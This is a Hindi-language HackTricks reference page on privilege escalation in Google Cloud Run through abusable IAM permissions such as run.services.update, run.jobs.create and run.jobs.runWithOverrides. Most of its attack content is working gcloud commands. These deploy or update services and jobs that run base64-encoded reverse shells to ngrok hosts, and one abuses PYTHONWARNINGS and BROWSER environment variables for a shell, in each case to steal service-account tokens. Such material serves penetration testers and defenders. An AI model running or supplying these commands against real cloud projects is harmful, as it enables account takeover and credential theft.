Hindi - Ht Cloud

GCP - Run Privesc

Support HackTricks

Cloud Run

Cloud Run के बारे में अधिक जानकारी के लिए देखें:

run.services.create , iam.serviceAccounts.actAs, run.routes.invoke

एक हमलावर के पास मनमाने कोड को चलाने वाली एक रन सेवा बनाने के लिए ये अनुमतियाँ हैं (मनमाना Docker कंटेनर), इसे एक सेवा खाता संलग्न करें, और कोड को मेटाडेटा से सेवा खाता टोकन को एक्सफिल्ट्रेट करने के लिए बनाएं।

इस विधि के लिए एक एक्सप्लॉइट स्क्रिप्ट यहाँ मिल सकती है और Docker इमेज यहाँ मिल सकती है।

ध्यान दें कि जब gcloud run deploy का उपयोग किया जाता है तो केवल सेवा बनाने के बजाय इसकी update अनुमति की आवश्यकता होती है। एक उदाहरण यहाँ देखें।

run.services.update , iam.serviceAccounts.actAs

पिछले वाले की तरह लेकिन एक सेवा को अपडेट करते समय:

# Launch some web server to listen in port 80 so the service works
echo "python3 -m http.server 80;sh -i >& /dev/tcp/0.tcp.eu.ngrok.io/14348 0>&1" | base64
# cHl0aG9uMyAtbSBodHRwLnNlcnZlciA4MDtzaCAtaSA+JiAvZGV2L3RjcC8wLnRjcC5ldS5uZ3Jvay5pby8xNDM0OCAwPiYxCg==

gcloud run deploy hacked \
--image=ubuntu:latest \
--command=bash \
--args="-c,echo cHl0aG9uMyAtbSBodHRwLnNlcnZlciA4MDtzaCAtaSA+JiAvZGV2L3RjcC8wLnRjcC5ldS5uZ3Jvay5pby8xNDM0OCAwPiYxCg== | base64 -d | bash" \
--service-account="<proj-num>-compute@developer.gserviceaccount.com" \
--region=us-central1 \
--allow-unauthenticated

# If you don't have permissions to use "--allow-unauthenticated", dont use it

run.services.setIamPolicy

अपने आप को क्लाउड रन पर पिछले अनुमतियाँ दें।

run.jobs.create, run.jobs.run, iam.serviceaccounts.actAs,(run.jobs.get)

कमांड में निर्दिष्ट सेवा खाते को चुराने के लिए एक रिवर्स शेल के साथ एक नौकरी लॉन्च करें। आप यहां एक एक्सप्लॉइट पा सकते हैं.

gcloud beta run jobs create jab-cloudrun-3326 \
--image=ubuntu:latest \
--command=bash \
--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNC50Y3AuZXUubmdyb2suaW8vMTIxMzIgMD4mMQ== | base64 -d | bash" \
--service-account="<sa>@$PROJECT_ID.iam.gserviceaccount.com" \
--region=us-central1

run.jobs.update,run.jobs.run,iam.serviceaccounts.actAs,(run.jobs.get)

पिछले की तरह, एक जॉब को अपडेट करना और SA को अपडेट करना संभव है, कमांड और इसे निष्पादित करना:

gcloud beta run jobs update hacked \
--image=mubuntu:latest \
--command=bash \
--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash" \
--service-account=<proj-num>-compute@developer.gserviceaccount.com \
--region=us-central1 \
--execute-now

run.jobs.setIamPolicy

अपने लिए Cloud Jobs पर पिछले अनुमतियाँ दें।

run.jobs.run, run.jobs.runWithOverrides, (run.jobs.get)

एक नौकरी के निष्पादन के env वेरिएबल्स का दुरुपयोग करें ताकि मनमाना कोड निष्पादित किया जा सके और कंटेनर की सामग्री (स्रोत कोड) को डंप करने और मेटाडेटा के अंदर SA तक पहुँचने के लिए एक रिवर्स शेल प्राप्त किया जा सके:

gcloud beta run jobs execute job-name --region <region> --update-env-vars="PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=/bin/bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/14195 0>&1' #%s"

संदर्भ

HackTricks का समर्थन करें
PreviousGCP - Resourcemanager PrivescNextGCP - Secretmanager Privesc

Last updated